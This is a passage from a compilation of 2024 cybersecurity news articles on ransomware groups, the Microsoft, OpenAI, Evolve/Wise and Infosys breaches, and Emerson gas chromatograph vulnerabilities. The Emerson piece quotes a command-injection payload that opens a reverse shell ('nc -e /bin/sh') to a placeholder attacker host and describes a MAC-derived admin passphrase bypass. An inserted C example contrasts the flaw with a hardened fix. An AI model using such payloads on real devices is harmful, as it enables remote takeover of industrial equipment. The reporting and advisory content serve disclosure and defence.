AT&T pledged to notify current and former customers, and it stated it had locked down the "point of unlawful access." The company stated in the filing that at least one person had been arrested in connection with the theft.

Microsoft’s Breach Notification Emails Wind Up in Spam Folder

 

Midnight Blizzard, a Russian nation-state hacker gang, breached Microsoft's security last year, gaining access to the emails of multiple customers. In late June, Microsoft revealed that more organisations were affected than previously assumed. However, the company's attempts to notify users may not have reached the intended recipients. 

According to Kevin Beaumont, a cybersecurity expert and former senior threat intelligence analyst at Microsoft, the company chose to notify affected victims via email. 

“The notifications aren’t in the portal – they emailed tenant admins instead. The emails can go into spam, and tenant admin accounts are supposed to be secure breakglass accounts without email. They also haven’t informed orgs via account managers,” Beaumont stated on LinkedIn. 

Apart from Beaumont's warnings, there is some evidence that Microsoft customers are genuinely perplexed. On a Microsoft support page, one customer posted the email their company had received, asking whether it was genuinely from Microsoft. 

Others commented on Beaumont's post, alleging that several organisations mistook Microsoft's email for a phishing attempt and deleted it or marked it as spam. The breach notification emails allegedly lacked basic email authentication mechanisms, including SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail). 

“Well, at first glance, this did not inspire trust for the recipients, who started asking in forums or reaching out to Microsoft account managers to eventually confirm that the email was legitimate...weird way for a provider like this to communicate an important issue to potentially affected customers,” the Greece-based cybersecurity consultant noted. 

In January, Microsoft admitted that Midnight Blizzard had attempted to hack the tech giant's internal systems. The same hacking group was behind the infamous SolarWinds hack, which wreaked havoc on US government installations in 2020.

Ransomware Group Uses Harassment Tactics to Secure Payments


 

A newly identified ransomware group named Volcano Demon is using aggressive tactics to compel victims to pay ransoms. Halcyon, an anti-ransomware firm, recently reported that this group has targeted several organisations in recent weeks with a new encryption tool called LukaLocker.

Attack Strategy

Volcano Demon’s attack method is both simple and effective. Initially, the hackers infiltrate the target’s network, mapping it out and stealing as many sensitive files as they can. Following this, they deploy LukaLocker to encrypt files and entire systems. The victims are then instructed to pay a ransom in cryptocurrency to receive the decryption key and prevent the stolen data from being leaked.

Technical Details of LukaLocker

LukaLocker works by adding a .nba extension to encrypted files and is capable of operating on both Windows and Linux systems. The encryptor is proficient at hiding its tracks by erasing logs before exploitation, making it difficult for cybersecurity experts to perform a full forensic analysis. Furthermore, LukaLocker can disable processes linked to most major antivirus and anti-malware solutions, making recovery efforts even more challenging.

Unlike typical ransomware groups that maintain dedicated data leak sites, Volcano Demon employs a more direct and intimidating approach. They contact the leadership of the victimised companies via phone calls from unidentified numbers to negotiate ransom payments. These calls are often threatening in nature, adding psychological pressure to the already stressful situation of a ransomware attack.

Impact on Businesses

The harassment tactic used by Volcano Demon increases the urgency and stress for affected businesses. The inability to conduct thorough forensic investigations due to LukaLocker’s log-clearing capabilities leaves victims vulnerable and with limited recovery options.

Businesses must enhance their cybersecurity measures to reduce the risk of such attacks. Implementing comprehensive logging and monitoring solutions, maintaining regular backups, and educating employees about common infiltration methods like phishing are critical steps. Additionally, organisations should ensure their antivirus and anti-malware solutions are robust and regularly updated to counteract disabling mechanisms like those employed by LukaLocker.

Volcano Demon’s approach to ransomware, characterised by harassing phone calls and sophisticated encryption methods, underscores the evolving nature of cyber threats. As cybercriminals develop new strategies to exploit vulnerabilities, it is essential for businesses to remain vigilant and proactive in their cybersecurity efforts to protect sensitive data and ensure operational continuity.




BianLian Ransomware Strikes: US Companies Grapple with Data Breach Fallout


The BianLian ransomware group is accused of cyberattacks against three major US companies, exposing large amounts of sensitive data. The victims of the BianLian ransomware attack—Island Transportation Corp., Legend Properties Inc., and Transit Mutual Insurance Corporation of Wisconsin—had their breaches detailed on a dark web forum by the ransomware gang.

This escalation illustrates the growing threat ransomware attacks present against important sectors across the United States.

The Targets

1. Island Transportation Corp.: A heavyweight in the bulk carrier industry, Island Transportation Corp. services the petroleum sector. Unfortunately, they fell victim to the BianLian ransomware attack, compromising a staggering 300 GB of organizational data. Among the exposed information are vital business records, accounting files, project details, and personal data.

2. Legend Properties Inc.: As a well-established commercial real estate and brokerage firm, Legend Properties Inc. found itself in the crosshairs. The attackers gained unauthorized access to 400 GB of sensitive data, including critical business information, accounting records, and personal details.

3. Transit Mutual Insurance Corporation of Wisconsin: A key player in the insurance industry, Transit Mutual Insurance Corporation of Wisconsin suffered a similar fate. The ransomware breach exposed 400 GB of organizational data, encompassing business records, accounting files, project data, and personal information.

The Broader Implications

  • Data Privacy: The compromised data includes personal information, which could lead to identity theft or financial fraud. Companies must prioritize robust data protection mechanisms.
  • Business Continuity: Disruptions caused by ransomware attacks can cripple operations. Organizations need robust backup systems and incident response plans.
  • Industry Vulnerability: No sector is immune. Whether shipping, real estate, or insurance, all must fortify their defenses against cyber threats.

Recommendations

  • Multi-Layered Security: Companies should adopt a multi-layered security approach, including firewalls, intrusion detection systems, and regular security audits.
  • Employee Training: Educate employees about phishing, social engineering, and safe online practices. Human error remains a significant vulnerability.
  • Incident Response Plans: Develop and test incident response plans to minimize damage during an attack.

The situation underscores the growing threat posed by ransomware attacks to critical sectors across the United States. 

While Island Transportation Corp.'s website remains functional, Legend Properties Inc. and Transit Mutual Insurance Corporation of Wisconsin have displayed blocking messages, indicating potential disruptions due to the attack.

Hacker Breaches OpenAI, Steals Sensitive AI Tech Details


 

Earlier this year, a hacker successfully breached OpenAI's internal messaging systems, obtaining sensitive details about the company's AI technologies. The incident, initially kept under wraps by OpenAI, was not reported to authorities as it was not considered a threat to national security. The breach was revealed through sources cited by The New York Times, which highlighted that the hacker accessed discussions in an online forum used by OpenAI employees to discuss their latest technologies.

The breach was disclosed to OpenAI employees during an April 2023 meeting at their San Francisco office, and the board of directors was also informed. According to sources, the hacker did not penetrate the systems where OpenAI develops and stores its artificial intelligence. Consequently, OpenAI executives decided against making the breach public, as no customer or partner information was compromised.

Despite the decision to withhold the information from the public and authorities, the breach sparked concerns among some employees about the potential risks posed by foreign adversaries, particularly China, gaining access to AI technology that could threaten U.S. national security. The incident also brought to light internal disagreements over OpenAI's security measures and the broader implications of their AI technology.

In the aftermath of the breach, Leopold Aschenbrenner, a technical program manager at OpenAI, sent a memo to the company's board of directors. In his memo, Aschenbrenner criticised OpenAI's security measures, arguing that the company was not doing enough to protect its secrets from foreign adversaries. He emphasised the need for stronger security to prevent the theft of crucial AI technologies.

Aschenbrenner later claimed that he was dismissed from OpenAI in the spring for leaking information outside the company, which he argued was a politically motivated decision. He hinted at the breach during a recent podcast, but the specific details had not been previously reported.

In response to Aschenbrenner's allegations, OpenAI spokeswoman Liz Bourgeois acknowledged his contributions and concerns but refuted his claims regarding the company's security practices. Bourgeois stated that OpenAI addressed the incident and shared the details with the board before Aschenbrenner joined the company. She emphasised that Aschenbrenner's separation from the company was unrelated to the concerns he raised about security.

While the company deemed the incident not to be a national security threat, the internal debate it sparked highlights the ongoing challenges in safeguarding advanced technological developments from potential threats.


Fintech Frenzy as Affirm and Others Emerge as Victims in Evolve Breach

 


The recent attack on one of the largest financial services providers has led to a problem for many companies that work with the provider, two of which have already alluded to possible negative implications for customer data due to the attack. There has been a strong rumour that the LockBit group successfully hacked the US Federal Reserve earlier last week, which has caused the group to receive some undue attention. A far less serious breach had also occurred at the much smaller Evolve Bank & Trust. Memphis-based Evolve has released a statement regarding the incident. 

According to the statement, the attack was triggered by an Evolve employee clicking on a malicious phishing link sent to him in late May. Even though the attackers did not access most of the cash that customers had in their accounts, they did access and download customers' personal information from databases and a file share. The attackers also encrypted some of the company's data, but because backups existed, the company suffered only limited data loss and operational impact. Several days ago, the Federal Reserve Board announced an enforcement action against Evolve Bank & Trust concerning its anti-money laundering, risk management, and consumer compliance programs. It accused the company of deficiencies in these areas, as well as others. 

In a statement the Federal Reserve published in February 2023, the Fed noted that examinations conducted in 2023 found that Evolve had a risk-management program and controls that were not adequate to comply with anti-money laundering laws and consumer protection laws. According to Stephen Gates, principal security SME for Horizon3.AI, the biggest decision any organization needs to make once it has experienced a breach is what it is going to do next once the smoke begins to clear. 

Evolve Bank & Trust, a regulated bank, provided USD account details to Wise customers between 2020 and 2023 under a contract with Wise. Wise has now disclosed a data breach that may involve the personal information of some of its customers. To obtain USD account details from Evolve Bank & Trust, Wise had to share identifying information about its customers: names, addresses, dates of birth, contact information, SSNs or EINs for US customers, or another identity document number for non-US customers. Neither Evolve nor Wise has confirmed which data was affected. 

The LockBit ransomware group recently attacked Evolve Bank, an Arkansas-based financial institution. The attack resulted in data leaks on the Dark Web. After claiming to have hacked the US Fed earlier this week, LockBit got a lot of attention. When LockBit posted a threat to release "33 terabytes of juicy banking information containing Americans' banking secrets" if a ransom was not paid, it released some of the stolen data. At the end of the month, LockBit was kicked out of Evolve's system. 

When the victim refused to pay the ransom, the group leaked the information. Evolve is also a payments processor, and it offers business-to-business (B2B) banking-as-a-service (BaaS) and business-to-consumer (B2C) banking-as-a-service. More victims of the breach are coming forward, as it has affected more than just Evolve's direct customers. The multibillion-dollar London-based fintech company Wise, in a statement released last week, disclosed its partnership with Evolve Bank & Trust from 2020 to 2023. 

During this period, Wise collaborated with Evolve to "provide USD account details" to its customers. To facilitate this service, Wise shared sensitive customer information with Evolve, including names, addresses, dates of birth, contact details, and identification numbers, such as employer identification numbers and Social Security numbers. Wise indicated that this data "may have been involved" in Evolve's recent security breach. Similarly, the buy now, pay later (BNPL) company Affirm, which utilizes Evolve for the issuance and servicing of its Affirm Cards, reported potential exposure of customer information. 

Although Affirm clarified that customers' cards remained unaffected, the personal data shared with Evolve posed a significant concern. In an 8-K filing with the Securities and Exchange Commission (SEC), Affirm stated, "The full scope, nature, and impact of the incident on the Company and Affirm Card users, including the extent to which there has been unauthorized access to Affirm Card user Personal Information, are not yet known." Evolve's breach has prompted many of its other prominent partners in the financial services industry, including Stripe and Shopify, to investigate the potential impact on their customers' data. The situation remains under scrutiny as these companies assess whether their customers' sensitive information has been compromised.

Wise and Evolve Data Breach Highlights Risks of Third-Party Partnerships

 

Wise, a prominent financial technology company, recently disclosed a data breach impacting some customer accounts due to a ransomware attack on their former partner, Evolve Bank & Trust. The breach has raised significant concerns about the security of third-party partnerships, especially in financial services. From 2020 to 2023, Wise partnered with Evolve to provide USD account details for their customers. Last week, Evolve confirmed an attack attributed to the notorious ransomware group LockBit. 

The group leaked the data after the bank refused to pay the ransom. The breach underscores the precarious nature of relying on third-party companies for critical services and trusting their security measures. Evolve has not yet confirmed the specific personal information leaked. However, Wise has taken a transparent approach, confirming that the shared information included names, addresses, dates of birth, contact details, Social Security numbers (SSNs) or Employer Identification Numbers (EINs) for U.S. customers, and other identity document numbers for non-U.S. customers. 

Evolve’s initial investigation suggests that names, SSNs, bank account numbers, and contact information for most of their personal banking customers, as well as customers of their Open Banking partners, were affected. In response to the breach, Wise assured its customers that they no longer work with Evolve Bank & Trust. Currently, USD account details are provided by a different bank, emphasizing their commitment to security and customer trust. 

Wise has implemented additional security protocols and is collaborating with cybersecurity experts to understand the breach’s scope and fortify their defenses. Wise has proactively communicated with its customers, recommending precautionary steps such as changing passwords, enabling two-factor authentication, and monitoring account activity for any suspicious transactions. They have also provided resources and support to help customers protect their information. The breach has heightened concerns among customers regarding the security of their personal and financial information. 

Despite the challenges posed by the breach, Wise’s proactive approach and transparent communication have helped reassure customers. The company continues to work closely with cybersecurity experts to enhance their defenses and prevent future incidents. As the investigation progresses, Wise is determined to provide regular updates and support to affected customers. Their dedication to transparency and user security remains unwavering, ensuring that they take every step necessary to safeguard their users’ information and maintain their trust. 

This incident highlights the growing threat of cyberattacks on financial institutions and the critical need for robust security measures. Customers are reminded to stay alert and take proactive steps to protect their online accounts. Wise’s efforts to address the breach and protect their users underscore their commitment to maintaining trust and security for their customers.

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
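The vulnerable pattern described above beside a hardened version, as an added illustration (not Claroty's or Emerson's code): the file name is checked against a strict allowlist and gunzip is exec'd directly, so no shell ever parses it. The staging directory, file names and function names are hypothetical.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical staging directory for calibration files (not from the advisory). */
#define CAL_DIR "/tmp/cal"

/*
 * Vulnerable pattern (do not use): the caller-supplied file name is pasted
 * straight into a shell command line, so shell metacharacters in the name
 * become part of the command.  The string is only built here, never run.
 */
int build_unsafe_command(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "gunzip -c %s > %s/expanded", name, CAL_DIR);
}

/*
 * Hardened step 1: strict allowlist.  Calibration file names must be short,
 * end in ".gz", contain only [A-Za-z0-9_.-], and not start with a dot
 * (blocks hidden files and ".." traversal).  Anything containing a space,
 * ';', '>', '/' or other shell syntax is rejected outright.
 */
bool calibration_name_ok(const char *name)
{
    size_t n = name ? strlen(name) : 0;
    if (n < 4 || n > 64 || name[0] == '.')
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return false;
    }
    return strcmp(name + n - 3, ".gz") == 0;
}

/*
 * Hardened step 2: no shell at all.  gunzip is exec'd directly and the file
 * name travels as a single argv element, so even a name that slipped past
 * the allowlist could not be parsed as additional commands.
 * Returns gunzip's exit status, or -1 if the name is rejected or exec fails.
 */
int decompress_calibration(const char *name)
{
    if (!calibration_name_ok(name))
        return -1;

    char inpath[128], outpath[128];
    snprintf(inpath, sizeof inpath, "%s/%s", CAL_DIR, name);
    snprintf(outpath, sizeof outpath, "%s/expanded", CAL_DIR);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (!freopen(outpath, "w", stdout))  /* redirect without a shell */
            _exit(126);
        execlp("gunzip", "gunzip", "-c", inpath, (char *)NULL);
        _exit(127);                          /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[256];
    /* Constructed sample name with shell syntax embedded, as in the advisory. */
    const char *hostile = "x;id;.gz";
    build_unsafe_command(cmd, sizeof cmd, hostile);
    printf("unsafe command line: %s\n", cmd);
    printf("allowlist accepts %-12s -> %s\n", "probe_cal.gz",
           calibration_name_ok("probe_cal.gz") ? "yes" : "no");
    printf("allowlist accepts %-12s -> %s\n", hostile,
           calibration_name_ok(hostile) ? "yes" : "no");
    printf("decompress(hostile) = %d\n", decompress_calibration(hostile));
    return 0;
}
```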

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

LockBit Ransomware Attack on Infosys McCamish Systems Exposes Sensitive Data of Over Six Million Individuals

 

Infosys McCamish Systems (IMS) recently disclosed that a LockBit ransomware attack earlier this year compromised sensitive information of more than six million individuals. IMS, a multinational corporation specializing in business consulting, IT, and outsourcing services, primarily serves the insurance and financial services industries. The company has a significant presence in the U.S., catering to large financial institutions such as Bank of America and seven of the top ten insurers in the country. 

In February 2024, IMS informed the public about the ransomware attack that occurred in November 2023. Initially, the company reported that the personal data of around 57,000 Bank of America customers had been compromised. LockBit, the group responsible for the attack, claimed to have encrypted 2,000 computers within the IMS network. A recent notification to U.S. authorities revealed that the total number of affected individuals now exceeds six million. The notification outlined the steps taken by IMS, including the involvement of third-party eDiscovery experts, to conduct a thorough review of the compromised data. 

This review aimed to identify the personal information accessed and determine the individuals impacted. The compromised data includes a wide range of sensitive information, such as Social Security Numbers (SSNs), dates of birth, medical records, biometric data, email addresses and passwords, usernames and passwords, driver’s license or state ID numbers, financial account information, payment card details, passport numbers, tribal ID numbers, and U.S. military ID numbers. To mitigate the risks associated with this data exposure, IMS is offering affected individuals a free two-year identity protection and credit monitoring service through Kroll. 

The notification letters provided instructions on how to access these services. IMS has not disclosed the full list of impacted clients, but the notification mentioned Oceanview Life and Annuity Company (OLAC), an Arizona-based provider of fixed and fixed-indexed annuities, as one of the affected organizations. The list of impacted data owners may be updated as more customers request to be named in the filing. 

This breach highlights the critical importance of robust cybersecurity measures and the significant impact such attacks can have on both individuals and large financial institutions. The LockBit ransomware attack on IMS serves as a stark reminder of the vulnerabilities within the digital infrastructure of major corporations and the far-reaching consequences of data breaches.

Top Data Breaches and Cyber Attacks in 2024

 

We're more than halfway into 2024, and we've already witnessed some of the largest and most damaging data breaches in recent history. And just when you thought some of these hacks couldn't get much worse, they did. The worst data breaches of 2024 to date have already surpassed at least 1 billion stolen records and are expected to rise further. These breaches not only harm the individuals whose data was irretrievably compromised, but also embolden the criminals who profit from their malicious cyberattacks. 

AT&T data leak 

Three years after a hacker leaked a sample of allegedly stolen AT&T customer data, a data breach broker released the whole cache of 73 million user records to the public on an infamous cybercrime forum in March. Consumers' names, phone numbers, and postal addresses were among the personal information in the released data, and some consumers attested to the accuracy of their information. 

However, the telecom giant didn't respond until a security researcher found that the exposed data contained encrypted passwords needed to access a customer's AT&T account. The security researcher told TechCrunch at the time that the encrypted passwords were easily unscrambled, placing roughly 7.6 million existing AT&T user accounts at risk of hijacking. After TechCrunch reported the researcher's findings, AT&T asked its users to reset their account passwords. 

Synnovis ransomware attack 

A June cyberattack on Synnovis, a blood and tissue testing lab serving hospitals and health institutions in the United Kingdom's capital, caused weeks of severe disruption to patient services. Following the attack, the local National Health Service trusts that rely on the lab postponed thousands of operations and treatments, prompting an emergency response across the UK health sector. 

A Russia-based ransomware gang was blamed for the cyberattack, which resulted in the theft of data relating to nearly 300 million patient interactions over a "significant number" of years. The implications for those affected, similar to those of the Change Healthcare data breach, are expected to be severe and long-lasting. 

Snowflake hack

A series of data thefts from cloud data provider Snowflake quickly escalated into one of the year's largest breaches, thanks to the massive volumes of data stolen from its corporate customers. 

Cybercriminals stole hundreds of millions of customer records from some of the world's largest companies, including an alleged 560 million records from Ticketmaster, 79 million records from Advance Auto Parts, and approximately 30 million records from TEG, by using stolen credentials of data engineers with access to their employers' Snowflake environments. Snowflake, for its part, does not require (or enforce) that its customers use multi-factor authentication, the security feature that protects against breaches based on stolen or reused passwords.